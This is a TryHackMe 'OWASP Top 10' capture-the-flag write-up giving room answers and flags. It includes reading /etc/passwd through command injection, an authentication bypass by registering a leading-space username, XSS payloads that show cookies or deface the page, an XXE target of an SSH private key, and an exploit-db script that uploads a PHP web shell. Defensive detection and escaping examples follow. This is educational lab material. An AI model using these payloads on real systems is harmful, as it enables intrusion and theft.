https://blog.raw.pm/en/TryHackMe-OWASP-Top-10-write-up/
Submission: On August 23 via manual from PL — Scanned from DE
# OWASP Top 10 - Write-up - TryHackMe

Saturday 14 November 2020 (2020-11-14) / Thursday 4 August 2022 (2022-08-04)
noraj (Alexandre ZANNI)
Tags: eop, idor, linux, owasp, thm, web, writeups, xxe

## Information

### Room

- Name: OWASP Top 10
- Profile: tryhackme.com
- Difficulty: Easy
- Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.

## Write-up

### Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S exploitdb dbeaver python
```

### [Day 1] Command Injection Practical

#### #1

> What strange text file is in the website root directory?

Answer: drpepper.txt

Issue the `ls` command to list files.

```
css
drpepper.txt
evilshell.php
index.php
js
```

#### #2

> How many non-root/non-service/non-daemon users are there?

Answer: 0

Issue the `cat /etc/passwd` command; it seems there are no non-root/non-service/non-daemon users.

```
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
```

#### #3

> What user is this app running as?

Answer: www-data

Issue the `id` command.

```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

#### #4

> What is the user's shell set as?

Answer: /usr/sbin/nologin

`echo $SHELL` returns nothing, so let's try `cat /etc/passwd | grep www-data | cut -d ':' -f 7`.

```
/usr/sbin/nologin
```

#### #5

> What version of Ubuntu is running?

Answer: 18.04.4

Run `cat /etc/os-release`.

```
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
```

#### #6

> Print out the MOTD. What favorite beverage is shown?

Answer: DR PEPPER

```
$ ls -1 /etc/update-motd.d/
10-help-text
50-landscape-sysinfo
50-motd-news
80-esm
80-livepatch
90-updates-available
91-release-upgrade
92-unattended-upgrades
95-hwe-eol
97-overlayroot
98-fsck-at-reboot
98-reboot-required
$ cat /etc/update-motd.d/00-header
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
        # Fall back to using the very slow lsb_release utility
        DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
DR PEPPER MAKES THE WORLD TASTE BETTER!
```

### [Day 2] Broken Authentication Practical

#### #1

> What is the flag that you found in darren's account?

Register as ` darren` (note the leading space) and log in.

Answer: fe86079416a21a3c99937fea8874b667

#### #3

> What is the flag that you found in arthur's account?

Register as ` arthur` (note the leading space) and log in.

Answer: d9ac0f7db4fda460ac3edeb75d75e16e

### [Day 3] Sensitive Data Exposure (Challenge)

#### #1

> Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
>
> What is the name of the mentioned directory?

Answer: /assets

#### #2

> Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Answer: webapp.db

#### #3

> Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Answer: 6eea9b7ef19179a06954edd0f6c05ceb

Open the DB with DBeaver.

#### #4

> Crack the hash. What is the admin's plaintext password?

Answer: qwertyuiop

Crack the password with CrackStation.

#### #5

> Login as the admin. What is the flag?

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

### [Day 4] XML External Entity - eXtensible Markup Language

#### #1

> Full form of XML

Answer: eXtensible Markup Language

#### #2

> Is it compulsory to have XML prolog in XML documents?

Answer: no

#### #3

> Can we validate XML documents against a schema?

Answer: yes

#### #4

> How can we specify XML version and encoding in XML document?

Answer: XML Prolog

### [Day 4] XML External Entity - DTD

#### #1

> How do you define a new ELEMENT?

Answer: !ELEMENT

#### #2

> How do you define a ROOT element?

Answer: !DOCTYPE

#### #3

> How do you define a new ENTITY?

Answer: !ENTITY

### [Day 4] XML External Entity - Exploiting

#### #3

> What is the name of the user in /etc/passwd

Answer: falcon

#### #4

> Where is falcon's SSH key located?

Answer: /home/falcon/.ssh/id_rsa

#### #5

> What are the first 18 characters for falcon's private key

Answer: MIIEogIBAAKCAQEA7b

### [Day 5] Broken Access Control (IDOR Challenge)

#### #3

> Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: flag{fivefourthree}

### [Day 6] Security Misconfiguration

#### #2

> Hack into the webapp, and find the flag!

https://github.com/NinjaJc01/PensiveNotes

Answer: thm{4b9513968fd564a87b28aa1f9d672e17}

### [Day 7] Cross-site Scripting

#### #2

> Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".

```
<script>alert("Hello")</script>
```

Answer: ThereIsMoreToXSSThanYouThink

#### #3

> On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

```
<script>alert(window.location.hostname)</script>
```

Answer: ReflectiveXss4TheWin

#### #4

> Now navigate to http://10.10.93.135/stored and make an account.
>
> Then add a comment and see if you can insert some of your own HTML.

```
<b>noraj is bold</b>
```

Answer: HTML_T4gs

#### #5

> On the same page, create an alert popup box appear on the page with your document cookies.

```
<script>alert(document.cookie)</script>
```

(The DOM property is `document.cookie`, singular; `document.cookies` is undefined.)

Answer: W3LL_D0N3_LVL2s

#### #6

> Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.

```
<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>
```

Answer: websites_can_be_easily_defaced_with_xss

### [Day 8] Insecure Deserialization

#### #1

> Who developed the Tomcat application?

Answer: The Apache Software Foundation

#### #2

> What type of attack that crashes services can be performed with insecure deserialization?

Answer: denial of service

### [Day 8] Insecure Deserialization - Objects

#### #1

> Select the correct term of the following statement:

Answer: A Behaviour

### [Day 8] Insecure Deserialization - Deserialization

#### #1

> What is the name of the base-2 formatting that data is sent across a network as?

Answer: binary

### [Day 8] Insecure Deserialization - Cookies

#### #1

> If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?

Answer: webapp.com/login

#### #2

> What is the acronym for the web technology that Secure cookies work over?

Answer: HTTPS

### [Day 8] Insecure Deserialization - Cookies Practical

#### #1

> 1st flag (cookie value)

Answer: THM{good_old_base64_huh}

The cookie is a base64-encoded Python pickle; the flag is readable in the decoded bytes without unpickling anything.

```
$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
}q(X sessionIdqX c7dc44838e0847b1b45544948a92d194qX encodedflagqXTHM{good_old_base64_huh}qu.
```

#### #2

> 2nd flag (admin dashboard)

Answer: THM{heres_the_admin_flag}

### [Day 8] Insecure Deserialization - Remote Code Execution

#### #1

> flag.txt

Answer: 4a69a7ff9fd68

### [Day 9] Components With Known Vulnerabilities - Lab

> How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Answer: 1611

```
$ searchsploit CSE bookstore
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting  | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                       | php/webapps/48960.txt
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit online book store
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities            | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                | php/webapps/47922.txt
Online Book Store 1.0 - 'id' SQL Injection                      | php/webapps/48775.txt
Online Book Store 1.0 - Arbitrary File Upload                   | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution   | php/webapps/47887.py
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit -p 47887
  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47887
     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
File Type: ASCII text, with CRLF line terminators

$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ wc -c /etc/passwd
1611 /etc/passwd
```

### [Day 10] Insufficient Logging and Monitoring

> What IP address is the attacker using?

Answer: 49.99.13.16

> What kind of attack is being carried out?

Answer: brute force
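The Day 1 #2 and #4 tasks answer "how many real users" and "what shell does this account have" by eyeballing `/etc/passwd`. The following is an added example (not the author's code) that does the same classification programmatically: entries are real login users when their UID is in the human range (1000 and above on Debian/Ubuntu), not the `nobody` UID, and their shell is not a nologin shell. The embedded sample is the dump shown above; the page excerpt starts at `daemon`, so `root` is left out of it. The names `PasswdEntry`, `parse_passwd`, `human_users` and `shell_of` are this example's own.

```python
"""Classify /etc/passwd entries into service/daemon accounts and human login users."""
from dataclasses import dataclass

# Sample input: the entries from the Day 1 #2 dump above (the root line is not in the page excerpt).
PASSWD_FROM_PAGE = """\
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
FIRST_HUMAN_UID = 1000   # UID_MIN in /etc/login.defs on Debian/Ubuntu (assumption for other distros)
NOBODY_UID = 65534


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines; blank, comment and malformed lines are skipped, not guessed at."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def is_human_user(entry: PasswdEntry) -> bool:
    """A login user has a UID in the human range, is not nobody, and has a usable shell."""
    return (entry.uid >= FIRST_HUMAN_UID
            and entry.uid != NOBODY_UID
            and entry.shell not in NOLOGIN_SHELLS)


def human_users(text: str) -> list:
    """Names of non-root/non-service/non-daemon users (the Day 1 #2 question)."""
    return [e.name for e in parse_passwd(text) if is_human_user(e)]


def shell_of(text: str, username: str):
    """Login shell of one account, or None if the account is absent (the Day 1 #4 question)."""
    for e in parse_passwd(text):
        if e.name == username:
            return e.shell
    return None


if __name__ == "__main__":
    print("human users:", human_users(PASSWD_FROM_PAGE))          # []
    print("www-data shell:", shell_of(PASSWD_FROM_PAGE, "www-data"))  # /usr/sbin/nologin
```

On the room's box this returns an empty list, matching the answer of 0; appending a line such as `alice:x:1000:1000:Alice:/home/alice:/bin/bash` makes `alice` show up, which is the check a hardening review would run to spot unexpected interactive accounts.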
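The Day 7 stored-XSS tasks work because the comment page writes user input straight into the HTML. As an added example (not the room's or the author's code), here is the kind of rendering function that has that defect beside the escaped version, checked against the payloads quoted in the tasks above. `render_comment_unsafe`, `render_comment_safe` and `user_markup_survives` are this example's own names.

```python
"""A stored-comment renderer with the XSS sink from Day 7, beside its escaped form."""
import html

# Constructed inputs: the comment bodies used in the Day 7 tasks above.
PAYLOADS_FROM_PAGE = [
    '<script>alert("Hello")</script>',
    "<b>noraj is bold</b>",
    '<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>',
]


def render_comment_unsafe(author: str, body: str) -> str:
    """Raw interpolation: whatever the user typed becomes markup in every visitor's browser."""
    return f'<div class="comment"><span class="author">{author}</span><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """html.escape(quote=True) turns < > & " ' into entities, so input stays text in element
    and attribute context alike."""
    return (f'<div class="comment"><span class="author">{html.escape(author, quote=True)}</span>'
            f'<p>{html.escape(body, quote=True)}</p></div>')


def user_markup_survives(renderer, body: str) -> bool:
    """Render a fixed author with the given body and compare the number of '<' against the
    empty-body baseline: any extra tag opener came from the user, i.e. the sink is injectable."""
    baseline = renderer("tester", "")
    rendered = renderer("tester", body)
    return rendered.count("<") > baseline.count("<")


if __name__ == "__main__":
    for payload in PAYLOADS_FROM_PAGE:
        print(user_markup_survives(render_comment_unsafe, payload),   # True
              user_markup_survives(render_comment_safe, payload))     # False
```

The baseline comparison is a cheap regression test for a template: if a renderer ever lets the count of `<` grow with user input, escaping was dropped somewhere. Escaping is context-specific, so content placed inside a `<script>` block or a URL attribute needs its own encoder rather than `html.escape`.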
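The Day 8 cookies practical decodes a base64 Python pickle with `base64 -d` and reads the flag out of the raw bytes. The following added example (not the room's code) does that inspection safely in Python with `pickletools.genops`, which walks the opcode stream without building objects or importing anything, and flags opcodes (`GLOBAL`, `REDUCE`, `BUILD`, ...) that would let a pickle run code when loaded. It then shows the replacement a defender would reach for: an HMAC-signed JSON cookie that cannot be forged or tampered with. `inspect_cookie`, `inspect_pickle`, `sign_session`, `verify_session` and the `Note` class are this example's own; the key is a constructed test value.

```python
"""Inspect a pickle cookie without unpickling it, then a signed-JSON session cookie instead."""
import base64
import hashlib
import hmac
import json
import pickle
import pickletools

# Cookie value from the Day 8 cookies practical above.
COOKIE_FROM_PAGE = ("gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRx"
                    "AlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==")

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
# Opcodes through which a pickle imports or calls code when it is loaded.
CODE_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD", "INST", "OBJ",
            "NEWOBJ", "NEWOBJ_EX", "EXT1", "EXT2", "EXT4"}


def looks_like_pickle(raw: bytes) -> bool:
    """Protocol 2+ pickles open with the PROTO opcode (0x80); that covers any modern dump."""
    return raw[:1] == b"\x80"


def inspect_pickle(raw: bytes) -> dict:
    """Walk the opcode stream; no objects are built and no code runs."""
    strings, code_ops = [], []
    for opcode, arg, _pos in pickletools.genops(raw):
        if opcode.name in STRING_OPS:
            strings.append(arg)
        elif opcode.name in CODE_OPS:
            code_ops.append(opcode.name)
    return {"strings": strings, "code_ops": code_ops}


def inspect_cookie(cookie_b64: str):
    """Base64-decode a cookie and inspect it if it is a pickle; None otherwise."""
    raw = base64.b64decode(cookie_b64)
    return inspect_pickle(raw) if looks_like_pickle(raw) else None


class Note:
    """Plain class; pickling an instance emits GLOBAL/NEWOBJ, which the inspector flags."""


def sample_object_pickle() -> bytes:
    return pickle.dumps(Note(), protocol=3)


# --- The replacement: a signed JSON cookie. Only the server holds `key`. ---

def sign_session(data: dict, key: bytes) -> str:
    payload = base64.urlsafe_b64encode(
        json.dumps(data, sort_keys=True, separators=(",", ":")).encode()).decode()
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{mac}"


def verify_session(cookie: str, key: bytes):
    """Return the session dict, or None if the MAC is missing or wrong (forged/tampered)."""
    payload, sep, mac = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))


if __name__ == "__main__":
    print(inspect_cookie(COOKIE_FROM_PAGE))
    key = b"constructed-test-key"      # constructed; a real key is random and kept server-side
    cookie = sign_session({"sessionId": "c7dc44838e0847b1b45544948a92d194"}, key)
    print(verify_session(cookie, key), verify_session(cookie + "x", key))
```

The page's cookie contains only a dict of strings, so `code_ops` is empty and the flag appears among `strings`; the `Note` sample shows that even a harmless class instance trips the check, which is the point: a cookie format should never carry class references at all. With the signed-JSON form the client can still read the payload, but changing `sessionId` invalidates the MAC.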
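The Day 10 questions are answered by reading an auth log and noticing one source address failing to log in over and over. As an added example (not the room's log or code), here is the detection logic a monitoring pipeline would run: parse login events, keep a sliding time window of failures per source IP, and report sources whose failure count inside any window reaches a threshold. The log format, the timestamps and the second host are constructed; the attacker address is the one the room's answer names. `parse_events` and `brute_force_sources` are this example's own names.

```python
"""Sliding-window brute-force detection over authentication log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (format assumed for this example, not the room's log).
SAMPLE_LOG = """\
2020-11-14 10:00:01 login failed user=admin src=49.99.13.16
2020-11-14 10:00:02 login failed user=admin src=49.99.13.16
2020-11-14 10:00:02 login failed user=root src=49.99.13.16
2020-11-14 10:00:03 login failed user=admin src=49.99.13.16
2020-11-14 10:00:04 login ok user=darren src=10.0.0.5
2020-11-14 10:00:05 login failed user=administrator src=49.99.13.16
2020-11-14 10:00:06 login failed user=admin src=49.99.13.16
2020-11-14 10:00:10 login failed user=darren src=10.0.0.5
this line is not a login event and is ignored
2020-11-14 10:15:00 login failed user=admin src=49.99.13.16
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) login (?P<result>ok|failed) "
    r"user=(?P<user>\S+) src=(?P<ip>\S+)$")


def parse_events(text: str) -> list:
    """(timestamp, result, user, ip) tuples; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def brute_force_sources(text: str, threshold: int = 5,
                        window: timedelta = timedelta(minutes=1)) -> dict:
    """Map each offending source IP to the peak number of failures seen inside one window.

    Events are processed in time order; for each failure the source's deque drops timestamps
    older than `window`, so its length is the failure count in the trailing window.
    """
    recent = defaultdict(deque)
    peak = defaultdict(int)
    for ts, result, _user, ip in sorted(parse_events(text)):
        if result != "failed":
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    print(brute_force_sources(SAMPLE_LOG))   # {'49.99.13.16': 6}
```

A single failure from `10.0.0.5` and the stray failure from the attacker a quarter of an hour later both stay under the threshold, so only the burst is reported. Tuning `threshold` and `window` against real traffic matters more than the code: too tight and a user with a mistyped password pages someone, too loose and a slow-and-low spray never trips it.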